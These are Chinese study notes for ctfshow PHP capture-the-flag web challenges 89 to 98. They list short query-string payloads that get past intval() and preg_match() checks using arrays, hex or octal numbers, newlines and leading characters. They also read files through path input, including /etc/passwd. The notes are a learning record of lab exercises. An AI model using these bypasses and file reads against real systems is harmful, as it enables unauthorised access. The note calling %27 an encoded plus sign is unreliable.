因为没钱充ctfshow会员,只能跟着视频教程白嫖
89
intval绕过
提交一个不为空的数组即可绕过
?num[]= //就直接绕过了
intval详解
90
进制转换直接绕过
?num=0x117c
91
preg_match('/^php$/i' , $a)
终于知道后面地i是什么意思了,是匹配模式
i是大小写,m是多行匹配
?cmd=%0aphp //通过换行来绕过
preg_match('/^php$/i' , $a) //这个正则这匹配一行
92
看intval的那个教程
如果 base 是 0,通过检测 var 的格式来决定使用的进制:
如果字符串包括了 “0x” (或 “0X”) 的前缀,使用 16 进制 (hex);否则,
如果字符串以 “0” 开始,使用 8 进制(octal);否则,
将使用 10 进制 (decimal)。
?num=010574
?num=0x117c
93
字母被ban了
?num=010574
94
strpos() 函数查找字符串在另一字符串中第一次出现的位置。
所以num中肯定要存在0,但不能是第一个
num=4476.0
95
num=_010574 //010574是4476八进制形式,因为要有0,但是这个不行
intval(_010574) === 4476 没过
num=+010574 //过了
对加号进行编码,也行
num=%27010574
空格也是可以的
num= 010574
num=%20010574
空格进行编码也可以
96
u=/etc/passwd //可以读文件
就是你要找到flag.php的位置
u=./flag.php
u=/var/www/html/flag.php //看报错得到这个绝对路径
u=/var/www/html/../html/flag.php
97
传数组
a[]=1&b[]=2
98
